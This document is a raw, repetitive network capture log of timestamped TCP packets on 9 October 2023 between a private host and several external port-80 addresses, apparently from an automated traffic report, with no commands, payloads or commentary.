                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683615923 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683661938 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683667898 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683711052 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683712006 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683747053 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683796883 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.683840990 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.692203045 CEST804984223.227.38.74192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.718817949 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.718866110 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.718907118 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.718935013 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719028950 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719069958 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719100952 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719141006 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719171047 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719214916 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719218969 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719253063 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719312906 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719355106 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719389915 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719434977 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719444990 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719487906 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719497919 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719537020 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719541073 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719580889 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719604015 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.719645977 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.757647991 CEST804979570.39.251.249192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.758318901 CEST804979570.39.251.249192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.758418083 CEST4979580192.168.2.370.39.251.249
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.762667894 CEST8049812185.80.51.179192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.762732983 CEST4981280192.168.2.3185.80.51.179
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.779863119 CEST804984223.227.38.74192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.780776024 CEST4984280192.168.2.323.227.38.74
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.824285984 CEST804984469.163.239.62192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.824691057 CEST804984469.163.239.62192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.824755907 CEST4984480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.836050034 CEST8049845104.21.68.7192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.846671104 CEST8049845104.21.68.7192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.846755981 CEST4984580192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.850519896 CEST4984480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.859220028 CEST804984674.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.859467983 CEST4984680192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.869426012 CEST4984680192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.869452953 CEST4984680192.168.2.374.208.236.101
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.871535063 CEST4984580192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.874249935 CEST4984780192.168.2.3195.78.66.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:29.875547886 CEST4984880192.168.2.3142.250.189.19
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002515078 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002538919 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002553940 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002583027 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002599955 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002631903 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002682924 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002726078 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002737045 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002774000 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002788067 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002825022 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002878904 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002914906 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002927065 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002948999 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002966881 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.002974033 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003010035 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003181934 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003228903 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003242970 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003279924 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003323078 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003366947 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003380060 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003422022 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003432035 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003473997 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003521919 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.003562927 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.037790060 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.037812948 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.037867069 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.037940979 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.037954092 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038007021 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038023949 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038063049 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038121939 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038170099 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038203955 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038253069 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038302898 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038347960 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038386106 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038435936 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038461924 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038508892 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038553953 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038598061 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038635969 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038681030 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038707018 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038758039 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038808107 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038853884 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038899899 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.038942099 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039001942 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039047956 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039086103 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039129972 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039174080 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039220095 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039261103 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039308071 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039334059 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039385080 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039556980 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039601088 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039654970 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039695978 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039743900 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039792061 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039802074 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.039843082 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.040627956 CEST8049845104.21.68.7192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.040683031 CEST4984580192.168.2.3104.21.68.7
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.041718960 CEST804984469.163.239.62192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.041788101 CEST4984480192.168.2.369.163.239.62
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.049032927 CEST8049848142.250.189.19192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.049124956 CEST4984880192.168.2.3142.250.189.19
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.054655075 CEST4984880192.168.2.3142.250.189.19
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.059331894 CEST4980480192.168.2.3185.15.129.58
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.078705072 CEST4984980192.168.2.3162.43.120.128
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.086536884 CEST804984674.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.086571932 CEST804984674.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.086630106 CEST804984674.208.236.101192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.137856007 CEST804980960.43.154.138192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.138468981 CEST4980980192.168.2.360.43.154.138
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.222309113 CEST8049847195.78.66.50192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.222769022 CEST4984780192.168.2.3195.78.66.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.222769022 CEST4984780192.168.2.3195.78.66.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.226825953 CEST8049848142.250.189.19192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.278820992 CEST8049848142.250.189.19192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.278990984 CEST4984880192.168.2.3142.250.189.19
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321444988 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321460009 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321506023 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321521997 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321526051 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321537018 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321556091 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321573019 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321584940 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321597099 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321609020 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321626902 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321646929 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321652889 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321664095 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321686029 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321688890 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321700096 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321718931 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321746111 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321753025 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321788073 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321789026 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321801901 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321814060 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321822882 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321840048 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321846962 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321866035 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321888924 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321902990 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321916103 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321926117 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321943045 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321948051 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321964979 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.321983099 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322021961 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322055101 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322056055 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322078943 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322093964 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322115898 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322117090 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322155952 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322185040 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322208881 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322223902 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322242022 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322247028 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322258949 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322283030 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322302103 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322397947 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322408915 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322441101 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322443962 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322448015 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322457075 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322480917 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.322513103 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.330295086 CEST4985080192.168.2.33.64.163.50
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.347709894 CEST8049849162.43.120.128192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.347822905 CEST4984980192.168.2.3162.43.120.128
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.348103046 CEST4984980192.168.2.3162.43.120.128
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.356853008 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.356900930 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.356935024 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.356939077 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.356944084 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.356976986 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.356980085 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357013941 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357014894 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357048988 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357050896 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357089043 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357094049 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357125044 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357126951 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357161045 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357165098 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357197046 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357198954 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357233047 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357237101 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357273102 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357275963 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357309103 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357311964 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357347965 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357347965 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357384920 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357384920 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357422113 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357423067 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357461929 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357481003 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357517958 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357537985 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357553959 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357557058 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357590914 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357599020 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357625961 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357635021 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357665062 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357671022 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357702017 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357707024 CEST4983780192.168.2.3217.79.184.35
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357738018 CEST8049837217.79.184.35192.168.2.3
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:30.357744932 CEST4983780192.168.2.3217.79.184.35
